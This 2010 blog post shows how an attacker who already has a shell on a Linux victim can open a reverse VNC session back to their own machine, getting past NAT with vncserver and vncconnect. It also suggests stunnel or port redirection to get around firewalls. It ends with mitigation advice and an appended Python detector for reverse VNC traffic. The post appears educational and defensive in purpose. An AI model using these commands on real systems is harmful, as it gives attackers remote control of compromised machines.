Thursday, 16 December 2010

Setting up a reverse VNC connection (linux version)

If you are reading this, you have probably heard of a reverse shell, where an attacker uses a buffer overflow (or some other exploit) to make the victim connect back to an attacking system that has a public IP address (perhaps bypassing a NAT or firewall rule-set).

A lot of control is possible with a command line shell, but for some operations a graphical interface, such as VNC, can be useful.

If a target system is behind a NAT, it is still possible to connect out with a VNC connection, giving graphical control of the target system to an external attacking system. This is possible, even without using SSH port tunnelling.

This article is only intended for educational purposes. Please do not use this to try to bypass security controls.


How to set this up

In this example I have two Linux systems, and the attacker system has used an exploit to gain an initial command line shell to the victim.

On the attacking system (which has a public IP address) start vncviewer as follows:

vncviewer -listen

You should get a response something like:

vncviewer -listen: Listening on port 5500


On the target system, you can start the VNC server and enter a password as follows:

vncserver :1

It is then possible to use vncconnect to connect the local vncserver on the target system back to the attacker system:

vncconnect -display :1 :5500

This forwards the VNC connection from the target system back to the attacker, and a nice graphical interface of the target pops up on the attacker's desktop.


Of course, these connections could be run on different ports (dependent on firewall rules), redirected with port-redirectors, or tunneled over other protocols, for example SSL using stunnel.

Similar solutions are just as easy with Windows systems, so definitely something to be aware of.


Mitigations
  • When defining firewall rules, it is very important to focus on outbound rules (in addition to inbound rules).
  • Outbound connections should be logged and monitored to help identify hackers, virus infections, and technical employees trying to bypass security restrictions.
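
The monitoring point above, as an added detection example (not part of the original post): it flags outbound flows in which the internal host that opened the connection also sends the RFB version banner first, which is how a reverse VNC session looks on the wire whatever port is used. The flow record fields, the internal address ranges and the sample records are assumptions constructed for illustration.

```python
import ipaddress
import re

# RFB ProtocolVersion message ("RFB xxx.yyy\n"); the VNC *server* sends it first.
RFB_BANNER = re.compile(rb"RFB \d{3}\.\d{3}\n")
LISTEN_PORT = 5500  # port reported by "vncviewer -listen" in the post
# Assumption: RFC 1918 ranges are the internal network being monitored.
INTERNAL = [ipaddress.ip_network(n)
            for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def is_internal(ip):
    return any(ipaddress.ip_address(ip) in net for net in INTERNAL)

def classify(flow):
    """Return a reason string for a suspicious outbound flow, else None."""
    if not is_internal(flow["src"]) or is_internal(flow["dst"]):
        return None  # only internal -> external connections matter here
    # Strong, port-independent signal: the host that opened the TCP
    # connection also speaks first with an RFB banner, so it is the server.
    if flow["first_sender"] == "initiator" and RFB_BANNER.match(flow["first_payload"]):
        return "rfb-banner-from-initiator"
    # Weak signal: default listening-viewer port with unreadable payload,
    # e.g. when the session is wrapped in SSL as the post mentions.
    if flow["dport"] == LISTEN_PORT:
        return "default-listen-port"
    return None

def find_reverse_vnc(flows):
    return [(f["src"], f["dst"], f["dport"], reason)
            for f in flows if (reason := classify(f))]

def _flow(src, dst, dport, first_sender, first_payload):
    # Hypothetical record shape; map it from whatever your flow sensor emits.
    return dict(src=src, dst=dst, dport=dport,
                first_sender=first_sender, first_payload=first_payload)

# Constructed flow records (documentation address ranges, not real traffic).
TLS_HELLO = b"\x16\x03\x01\x02\x00"
SAMPLE_FLOWS = [
    _flow("10.1.2.3", "203.0.113.10", 5500, "initiator", b"RFB 003.008\n"),
    _flow("10.1.2.3", "203.0.113.10", 443, "initiator", b"RFB 003.008\n"),
    _flow("10.1.2.4", "198.51.100.7", 5900, "responder", b"RFB 003.008\n"),
    _flow("10.1.2.5", "198.51.100.7", 443, "initiator", TLS_HELLO),
    _flow("10.1.2.6", "203.0.113.10", 5500, "initiator", TLS_HELLO),
    _flow("203.0.113.10", "10.1.2.3", 5900, "responder", b"RFB 003.008\n"),
]

if __name__ == "__main__":
    for hit in find_reverse_vnc(SAMPLE_FLOWS):
        print(hit)
```

An ordinary outbound viewer session (third record) is not flagged because the remote side speaks first; a tunneled session only ever produces the weaker port-based hit, so destination and volume monitoring are still needed.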

7 comments:

  1. Thank you for this!
